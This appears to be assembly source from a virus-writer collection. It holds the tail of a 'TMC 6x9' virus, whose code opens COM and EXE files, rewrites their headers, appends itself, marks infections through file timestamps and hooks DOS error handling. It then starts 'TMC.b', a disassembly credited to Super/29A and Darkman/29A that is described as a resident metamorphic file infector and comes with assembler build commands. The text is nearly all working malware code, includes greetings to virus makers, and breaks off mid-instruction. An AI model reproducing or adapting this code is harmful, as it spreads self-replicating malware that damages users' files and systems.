; COMMAND.COM? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('iw' xor 0aa55h) db 01110100b+10000000b ; WIN.COM? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('rk' xor 0aa55h) db 01110100b+10000000b ; Equal? 
Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a4h ; Pointer to int24_store db 03h ; Three bytes instruction mov ax,3d02h ; Open file (read/write) db 01h ; One byte instruction pushf ; Save flags at stack db 05h ; Five bytes instruction call dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 01110010b+10000000b ; Error? Jump to infect_exit dw 1771h ; Pointer to infect_exit db 02h ; Two bytes instruction mov bx,ax ; BX = file handle db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 02h ; Two bytes instruction mov ds,ax ; DS = segment 0000h (BIOS data area at 0000h:0400h) db 04h ; Four bytes instruction mov si,ds:[46dh] ; SI = word at 0000h:046dh, inside the BIOS timer tick count db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 01h ; One byte instruction pop es ; Load ES from stack (CS) db 03h ; Three bytes instruction mov ax,5700h ; Get file's date and time db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 04h ; Four bytes instruction mov ds:[1234h],dx ; Store file's date db 11101101b ; Data reference dw 12dh ; Pointer to file_date db 02h ; Two bytes instruction mov al,cl ; AL = low-order byte of file time db 02h ; Two bytes instruction and al,00011111b ; AL = file seconds field (two-second units) db 02h ; Two bytes instruction cmp al,00000100b ; Already infected (8 seconds)? db 01110100b+10000000b ; Equal?
Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction and cl,11100000b ; Zero file seconds db 03h ; Three bytes instruction or cl,00000100b ; Set infection mark (8 seconds) db 04h ; Four bytes instruction mov ds:[1234h],cx ; Store file's time db 11101101b ; Data reference dw 12ch ; Pointer to file_time db 03h ; Three bytes instruction and si,1111111111110000b db 04h ; Four bytes instruction cmp ds:[1234h],si ; Infect file? db 11101101b ; Data reference dw 13adh ; Pointer to timer_ticks db 01110100b+10000000b ; Equal? Jump to close_file dw 0fah ; Pointer to close_file db 04h ; Four bytes instruction mov ds:[1234h],si ; Store timer ticks since midnight db 11101101b ; Data reference dw 13adh ; Pointer to timer_ticks db 02h ; Two bytes instruction mov ah,3fh ; Read from file db 03h ; Three bytes instruction mov cx,18h ; Read twenty-four bytes db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of exe_header db 11101101b ; Data reference dw 138fh ; Pointer to exe_header db 02h ; Two bytes instruction mov si,dx ; SI = offset of exe_header db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov ax,4202h ; Set current file position (EOF) db 01h ; One byte instruction cwd ; DX = high-order word of offset f... db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 06h ; Six bytes instruction mov ds:[00h],0010111010001101b db 04h ; Four bytes instruction cmp [si],'ZM' ; EXE signature? db 01110100b+10000000b ; Equal? Jump to infect_exe dw 138dh ; Pointer to infect_exe db 04h ; Four bytes instruction cmp [si],'MZ' ; EXE signature? db 01110100b+10000000b ; Equal? 
Jump to infect_exe dw 138dh ; Pointer to infect_exe db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store executable status db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 03h ; Three bytes instruction cmp ax,0bb8h ; Too small in filesize? db 01110010b+10000000b ; Below? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction cmp ax,0dea8h ; Too large in filesize? db 01110111b+10000000b ; Above? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov di,1234h ; DI = offset of exe_header db 11101101b ; Data reference dw 138fh ; Pointer to exe_header db 02h ; Two bytes instruction mov cl,[di] ; CL = first byte of original code... db 03h ; Three bytes instruction mov byte ptr [di],11101001b db 01h ; One byte instruction inc di ; DI = offset within exe_header db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store first byte of original cod... db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store first byte of original cod... db 11101101b ; Data reference dw 1776h ; Pointer to incorr_code_ db 02h ; Two bytes instruction mov cx,[di] ; CX = word of original code of in... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 03h ; Three bytes instruction mov [si+01h],cx ; Store word of original code of i... db 03h ; Three bytes instruction sub ax,03h ; AX = offset of virus within infe... db 01h ; One byte instruction stosw ; Store offset of virus within inf... db 03h ; Three bytes instruction mov ax,14h ; AX = probability of storing inco... db 04h ; Four bytes instruction cmp ds:[1234h],ax ; Store incorrect IP? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110111b+10000000b ; Above? 
Jump to write_virus dw 13afh ; Pointer to dont_corrupt db 03h ; Three bytes instruction mov bp,10h ; Random number within sixteen db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 03h ; Three bytes instruction sub ax,08h ; Subtract eight from random number db 02h ; Two bytes instruction add cx,ax ; Add random number to word of ori... db 11101001b ; JMP imm16 (opcode 0e9h) dw 13afh ; Pointer to dont_corrupt db 11101111b ; End of block dont_corrupt db 11101110b ; Beginning of block dw 13afh ; Block identification of dont_cor... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of incorr_code_ db 11101101b ; Data reference dw 1776h ; Pointer to incorr_code_ db 03h ; Three bytes instruction mov [si+01h],cx ; Store word of original code of i... db 01h ; One byte instruction pop si ; Load SI from stack db 03h ; Three bytes instruction mov ax,0fff0h ; AX = initial CS and SS relative ... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial CS relative to sta... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SS relative to sta... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction mov ax,100h ; AX = initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 138bh ; Pointer to initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 03h ; Three bytes instruction mov ax,0fffeh ; AX = initial SP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SP db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 01h ; One byte instruction inc ax ; Increase size of memory block in... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store size of memory block in pa... 
db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 03h ; Three bytes instruction mov ax,1000h ; AX = new size in paragraphs db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 03h ; Three bytes instruction mov ax,4202h ; Set current file position (EOF) db 01h ; One byte instruction cwd ; DX = low-order word of offset f... db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction add ax,100h ; AX = delta offset db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to write_virus db 11101111b ; End of block write_virus db 11101110b ; Beginning of block dw 138eh ; Block identification of write_virus db 03h ; Three bytes instruction mov ds:[02h],ax ; Store delta offset db 02h ; Two bytes instruction mov ah,40h ; Write to file db 01h ; One byte instruction cwd ; Zero DX db 03h ; Three bytes instruction mov cx,1234h ; CX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 01h ; One byte instruction cwd ; DX = low-order word of offset f... db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction mov dx,si ; DX = offset of exe_header db 03h ; Three bytes instruction mov cx,18h ; Write twenty-four bytes db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error?
Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov ax,5701h ; Set file's date and time db 04h ; Four bytes instruction mov cx,ds:[1234h] ; CX = new time db 11101101b ; Data reference dw 12ch ; Pointer to file_time db 04h ; Four bytes instruction mov dx,ds:[1234h] ; DX = new date db 11101101b ; Data reference dw 12dh ; Pointer to file_date db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fah ; Pointer to close_file db 11101111b ; End of block close_file db 11101110b ; Beginning of block dw 0fah ; Block identification of close_file db 02h ; Two bytes instruction mov ah,3eh ; Close file db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 1771h ; Pointer to infect_exit db 11101111b ; End of block infect_exit db 11101110b ; Beginning of block dw 1771h ; Block identification of infect_exit db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a5h ; Pointer to int24_load db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fbh ; Pointer to infect_exit_ db 11101111b ; End of block infect_exit_ db 11101110b ; Beginning of block dw 0fbh ; Block identification of infect_e... db 01h ; One byte instruction ret ; Return db 11101111b ; End of block infect_exe db 11101110b ; Beginning of block dw 138dh ; Block identification of infect_exe db 01h ; One byte instruction inc cx ; EXE executable db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store executable status db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 02h ; Two bytes instruction or dx,dx ; Too small in filesize? db 01110101b+10000000b ; Not zero? Jump to exam_filesiz dw 13aeh ; Pointer to exam_filesiz db 03h ; Three bytes instruction cmp ax,2710h ; Too small in filesize? db 01110010b+10000000b ; Below? 
Jump to close_file dw 0fah ; Pointer to close_file db 11101001b ; JMP imm16 (opcode 0e9h) dw 13aeh ; Pointer to exam_filesiz db 11101111b ; End of block exam_filesiz db 11101110b ; Beginning of block dw 13aeh ; Block identification of exam_fil... db 03h ; Three bytes instruction cmp dx,06h ; Too large in filesize? db 01110111b+10000000b ; Above? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 03h ; Three bytes instruction mov cx,200h ; Divide by pages db 02h ; Two bytes instruction div cx ; DX:AX = filesize in pages db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 03h ; Three bytes instruction cmp [si+04h],ax ; Internal overlay? db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 04h ; Four bytes instruction cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...? db 01110100b+10000000b ; Equal? Jump to maximum_mem dw 1399h ; Pointer to maximum_mem db 03h ; Three bytes instruction mov ax,[si+04h] ; AX = total number of 512-byte pa... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... 
db 11101001b ; JMP imm16 (opcode 0e9h) dw 1399h ; Pointer to maximum_mem db 11101111b ; End of block maximum_mem db 11101110b ; Beginning of block dw 1399h ; Block identification of maximum_mem db 03h ; Three bytes instruction add ax,[si+0ch] ; Add maximum paragraphs to alloca... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store size of memory block in pa... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 03h ; Three bytes instruction mov ax,[si+0eh] ; AX = initial SS relative to star... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SS relative to sta... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction mov ax,[si+10h] ; AX = initial SP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SP db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 03h ; Three bytes instruction mov ax,[si+14h] ; AX = initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 138bh ; Pointer to initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 03h ; Three bytes instruction mov ax,[si+16h] ; AX = initial CS relative to star... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial CS relative to sta... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 05h ; Five bytes instruction mov [si+0ch],0ffffh ; Store maximum paragraphs to allo... 
db 05h ; Five bytes instruction mov [si+10h],7ffeh ; Store initial SP db 05h ; Five bytes instruction mov word ptr [si+14h],00h db 03h ; Three bytes instruction mov cx,10h ; Divide by paragraphs db 02h ; Two bytes instruction div cx ; AX = filesize in paragraphs, DX = remainder db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 01h ; One byte instruction inc ax ; Increase initial CS/SS relative ... db 03h ; Three bytes instruction mov [si+0eh],ax ; Store initial SS relative to sta... db 03h ; Three bytes instruction mov [si+16h],ax ; Store initial CS relative to sta... db 03h ; Three bytes instruction mov ax,[si+04h] ; AX = total number of 512-byte pa... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 02h ; Two bytes instruction mov cl,05h ; Shift count: multiply by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = 512-byte pages converted to paragraphs db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 03h ; Three bytes instruction add ax,[si+0ah] ; Add minimum paragraphs to alloca... db 02h ; Two bytes instruction mov di,ax ; DI = minimum paragraphs to alloc... db 01h ; One byte instruction pop cx ; Load CX from stack (DX) db 01h ; One byte instruction pop dx ; Load DX from stack (AX) db 03h ; Three bytes instruction and dx,1111111111110000b db 03h ; Three bytes instruction add dx,10h ; DX = low-order word of offset fr... db 03h ; Three bytes instruction adc cx,00h ; CX = high-order word of offset f...
db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction add ax,1234h ; AX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 03h ; Three bytes instruction adc dx,00h ; Convert to 32-bit db 03h ; Three bytes instruction mov cx,200h ; Divide by pages db 02h ; Two bytes instruction div cx ; DX:AX = filesize in pages db 03h ; Three bytes instruction mov [si+02h],dx ; Store number of bytes in last 51... db 03h ; Three bytes instruction add dx,0ffffh ; Add sixty-five thousand five hun... db 03h ; Three bytes instruction adc ax,00h ; Convert to 32-bit db 03h ; Three bytes instruction mov [si+04h],ax ; Store total number of 512-byte p... db 05h ; Five bytes instruction mov [si+0ah],800h ; Store minimum paragraphs of memo... db 01h ; One byte instruction inc ax ; Store total number of 512-byte p... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 03h ; Three bytes instruction add ax,[si+0ah] ; Add maximum paragraphs to alloca... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction sub di,ax ; DI = additional minimum paragrap... db 01110110b+10000000b ; Below or equal? Jump to dont_add... dw 1396h ; Pointer to dont_add_mem db 03h ; Three bytes instruction add [si+0ah],di ; Add additional minimum paragraph... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1396h ; Pointer to dont_add_mem db 11101111b ; End of block dont_add_mem db 11101110b ; Beginning of block dw 1396h ; Block identification of dont_add... db 03h ; Three bytes instruction mov ax,14h ; AX = probability of storing inco... 
db 04h ; Four bytes instruction cmp ds:[1234h],ax ; Store incorrect IP? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 03h ; Three bytes instruction mov ax,00h ; ADD [BX+SI],AL (opcode 00h,00h) db 01110111b+10000000b ; Above? Jump to write_virus dw 138eh ; Pointer to write_virus db 03h ; Three bytes instruction mov bp,10h ; Random number within sixteen db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 02h ; Two bytes instruction sub al,08h ; Subtract eight from random number db 03h ; Three bytes instruction mov di,1234h ; DI = offset of incorrec_ip db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 03h ; Three bytes instruction add [di+01h],al ; Add random number to incorrect IP db 06h ; Six bytes instruction mov ds:[00h],1110110100110011b db 03h ; Three bytes instruction mov ax,1001000010010000b db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to write_virus db 11101111b ; End of block int24_virus db 11101110b ; Beginning of block dw 1770h ; Block identification of int24_virus db 02h ; Two bytes instruction mov al,03h ; Fail system call in progress db 01h ; One byte instruction iret ; Interrupt return db 11101111b ; End of block int24_store db 11101110b ; Beginning of block dw 13a4h ; Block identification of int24_store db 01h ; One byte instruction push dx ; Save DX at stack db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction mov ax,3524h ; Get interrupt vector 24h db 02h ; Two bytes instruction int 21h db 04h ; Four bytes instruction mov ds:[1234h],es ; Store segment of interrupt 24h db 11101101b ; Data reference dw 13a2h ; Pointer to int24_seg db 04h ; Four bytes instruction mov ds:[1234h],bx ; Store offset of interrupt 24h db 11101101b ; Data reference dw 13a3h ; Pointer to 
int24_off db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of int24_virus db 11101101b ; Data reference dw 1770h ; Pointer to int24_virus db 03h ; Three bytes instruction mov ax,2524h ; Set interrupt vector 24h db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop es ; Load ES from stack db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block int24_load db 11101110b ; Beginning of block dw 13a5h ; Block identification of int24_load db 01h ; One byte instruction push ds ; Save DS at stack db 05h ; Five bytes instruction mov dx,cs:[1234h] ; DX = offset of interrupt 24h db 11101101b ; Data reference dw 13a3h ; Pointer to int24_off db 05h ; Five bytes instruction mov ds,cs:[1234h] ; DS = segment of interrupt 24h db 11101101b ; Data reference dw 13a2h ; Pointer to int24_seg db 03h ; Three bytes instruction mov ax,2524h ; Set interrupt vector 24h db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block push_regs db 11101110b ; Beginning of block dw 13a0h ; Block identification of push_regs db 05h ; Five bytes instruction pop cs:[1234h] ; Load 16-bit immediate from stack db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bx ; Save BX at stack db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 01h ; One byte instruction push si ; Save SI at stack db 01h ; One byte instruction push di ; Save DI at stack db 01h ; One byte instruction push bp ; Save BP at stack db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction push es ; Save ES at stack db 05h ; Five bytes instruction jmp cs:[1234h] db 11101101b ; Data 
reference dw 13aah ; Pointer to imm16 db 11101111b ; End of block pop_regs db 11101110b ; Beginning of block dw 13a1h ; Block identification of pop_regs db 05h ; Five bytes instruction pop cs:[1234h] ; Load 16-bit immediate from stack db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 01h ; One byte instruction pop es ; Load ES from stack db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction pop bp ; Load BP from stack db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 05h ; Five bytes instruction jmp cs:[1234h] db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 11101111b ; End of block int21_addr db 11101110b ; Beginning of block dw 0c9h ; Block identification of int21_addr db 04h+10h ; Four bytes data dd 00h ; Address of interrupt 21h db 11101111b ; End of block int21_seg db 11101110b ; Beginning of block dw 13a2h ; Block identification of int24_seg db 02h+10h ; Two bytes data dw 00h ; Segment of interrupt 24h db 11101111b ; End of block int21_off db 11101110b ; Beginning of block dw 13a3h ; Block identification of int24_off db 02h+10h ; Two bytes data dw 00h ; Offset of interrupt 24h db 11101111b ; End of block imm16 db 11101110b ; Beginning of block dw 13aah ; Block identification of imm16 db 02h+10h ; Two bytes data dw 00h ; 16-bit immediate db 11101111b ; End of block exe_header db 11101110b ; Beginning of block dw 138fh ; Block identification of exe_header db 18h+10h ; Twenty-four bytes data db 18h dup(00h) ; EXE header db 11101111b ; End of block timer_ticks db 11101110b ; Beginning of block dw 13adh ; Block identification of timer_ticks db 02h+10h ; Two bytes data dw 00h ; Timer ticks since midnight db 
11101111b ; End of block file_time db 11101110b ; Beginning of block dw 12ch ; Block identification of file_time db 02h+10h ; Two bytes data dw 00h ; File time db 11101111b ; End of block file_date db 11101110b ; Beginning of block dw 12dh ; Block identification of file_date db 02h+10h ; Two bytes data dw 00h ; File date db 11101111b ; End of block progra_seg db 11101110b ; Beginning of block dw 139fh ; Block identification of progra_seg db 02h+10h ; Two bytes data dw 00h ; Segment of PSP for current process db 11101111b ; End of block file_handle db 11101110b ; Beginning of block dw 139dh ; Block identification of file_handle db 02h+10h ; Two bytes data dw 00h ; File handle db 11101111b ; End of block filename db 11101110b ; Beginning of block dw 139eh ; Block identification of filename db (filena_end-filena_begin)+10h filena_begin: db 07h dup(00h,01h,02h,03h,04h,05h,06h,07h,08h,09h,0ah) filena_end: db 11101111b ; End of block message db 11101110b ; Beginning of block dw 2328h ; Block identification of message db (message_end-messag_begin)+10h messag_begin db 0dh,0ah db 0dh,0ah db 'þ TMC 1.0 by Ender þ',0dh,0ah db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah db 'Dis is level 6*9.',0dh,0ah db 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel',0dh,0ah db 'Personal greetings: K. K., Dark Punisher',0dh,0ah db 0dh,0ah message_end: db 11101111b ; End of block db 00h ; End of table table_end: code_end: end code_begin ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_6x9.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_b.asm]ÄÄÄ comment * TMC.b ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ Super/29A and Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ TMC.b is a 4780 bytes resident appending COM and EXE virus. Infects at load and/or execute program, rename file and open file. 
TMC.b has an error handler, retro structures and is metamorphic in file and memory using Tiny Mutation Compiler v 1.00 [TMC]. To compile TMC.b with Turbo Assembler v 5.0 type: TASM /M TMC_B.ASM TLINK /x TMC_B.OBJ EXE2BIN TMC_B.EXE TMC_B.COM * .model tiny .code code_begin: mov bp,100h ; BP = delta offset cld ; Clear direction flag mov ax,ds ; AX = segment of PSP for current ... mov [bp+program_seg],ax ; Store segment of PSP for current... dec ax ; AX = segment of current Memory C... mov ds,ax ; DS = segment of current Memory C... mov ax,ds:[03h] ; AX = size of memory block in par... cmp ax,1900h ; Insufficient memory? jae resize_mem ; Above or equal? Jump to resize_mem jmp terminate resize_mem: push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov [bp+mcb_size_],ax ; Store size of memory block in p... mov bx,[bp+new_mcb_size] mov ah,4ah ; Resize memory block int 21h jnc allocate_mem ; No error? Jump to allocate_mem jmp terminate allocate_mem: mov ah,48h ; Allocate memory mov bx,[bp+mcb_size_] ; BX = size of memory block in par... sub bx,[bp+new_mcb_size] dec bx ; BX = number of paragraphs to all... cmp bx,0c00h ; Insufficient memory? jae allocat_mem ; Above or equal? Jump to allocat_... jmp terminate allocat_mem: int 21h jnc initiali_tmc ; No error? Jump to initiali_tmc jmp terminate initiali_tmc: mov es,ax ; ES = segment of allocated memory mov es:[01h],0deadh ; Store 16-bit random number mov word ptr es:[0ch],00h mov es:[04h],1000h ; Store offset of block information mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... mov es:[08h],3000h ; Store offset of data information lea si,[bp+tmc_table] ; SI = offset of tmc_table push si ; Save SI at stack mov bx,4000h ; BX = offset of next virus genera... jmp initial_tmc initial_tmc: mov di,10h ; DI = offset of table of blocks xor ax,ax ; Zero AX jmp tmc_ini_loop tmc_ini_loop: add si,ax ; SI = offset of block or instruct... call decrypt_byte or al,al ; End of table? jz calc_blocks ; Zero? 
Jump to calc_blocks nop nop nop cmp al,11101000b ; CALL; JMP; Data reference; Jcc? jae exam_block ; Above or equal? Jump to exam_block nop nop nop cmp al,10h ; Data? jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_... nop nop nop sub al,10h ; AL = length of data jmp tmc_ini_loop exam_block: cmp al,11101111b ; End of block? jne exam_block_ ; Not equal? Jump to exam_block_ nop nop nop mov al,00h ; Don't add anything to offset wit... jmp tmc_ini_loop exam_block_: cmp al,11101110b ; Beginning of block? jne next_byte ; Not equal? Jump to next_byte nop nop nop mov ax,si ; AX = offset of block identification dec ax ; AX = offset of block within table stosw ; Store offset of block within table mov ax,0ffffh ; Block is still in one part stosw ; Store block identification mov ax,02h ; Add two to offset within table jmp tmc_ini_loop next_byte: mov al,02h ; Add two to offset within table jmp tmc_ini_loop calc_blocks: lea ax,[di-10h] ; AX = number of blocks multiplied... shr ax,01h ; Divide number of blocks by two shr ax,01h ; Divide number of blocks by two mov es:[0ah],ax ; Store number of blocks xor ax,ax ; End of table stosw ; Store end of table mov di,10h ; DI = offset of table of blocks mov si,es:[di] ; SI = offset of block within table jmp exam_bloc split_block: push bp ; Save BP at stack mov bp,es:[0ah] ; BP = number of blocks call rnd_in_range pop bp ; Load BP from stack shl ax,01h ; Multiply random number with two shl ax,01h ; Multiply random number with two add ax,10h ; Add ten to random number mov di,ax ; DI = random offset within table jmp exam_nxt_blo exam_nxt_blo: add di,04h ; DI = offset of next offset withi... mov si,es:[di] ; SI = offset of next block within... or si,si ; End of table? jnz exam_block__ ; Not zero? Jump to exam_block__ nop nop nop mov di,10h ; DI = offset of table of blocks mov si,es:[di] ; SI = offset of block within table jmp exam_block__ exam_block__: push ax ; Save AX at stack call decrypt_byte dec si ; Decrease offset of block within ... 
cmp al,11101111b ; End of block? pop ax ; Load AX from stack jne exam_bloc ; Not equal? Jump to exam_bloc nop nop nop cmp di,ax ; End of table of blocks? jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo nop nop nop jmp exam_tbl_inf exam_bloc: mov ax,es:[di+02h] ; AX = block information cmp ax,0ffffh ; Block is still in one part? je exam_bloc_ ; Equal? Jump to exam_bloc_ nop nop nop push di ; Save DI at stack mov di,ax ; DI = offset of end of first part... mov al,11101001b ; JMP imm16 (opcode 0e9h) stosb ; Store JMP imm16 mov ax,bx ; AX = offset within next virus ge... dec ax ; Decrease offset within next viru... dec ax ; Decrease offset within next viru... sub ax,di ; Subtract offset of end of first ... stosw ; Store 16-bit immediate pop di ; Load DI from stack jmp exam_bloc_ exam_bloc_: call decrypt_byte cmp al,11101111b ; End of block? jne exam_bloc__ ; Not equal? Jump to exam_bloc__ jmp end_of_block exam_bloc__: cmp al,10h ; Data; CALL; JMP; Data reference...? ja exam_bloc___ ; Above? Jump to exam_bloc___ nop nop nop push ax bp ; Save registers at stack mov bp,[bp+probability] ; BP = probability call rnd_in_range or ax,ax ; Split up block? pop bp ax ; Load registers from stack jz split_block ; Zero? Jump to split_block_ nop nop nop jmp exam_bloc___ exam_bloc___: cmp al,11101111b ; End of block? jne exam_blo ; Not equal? Jump to exam_blo jmp end_of_block exam_blo: cmp 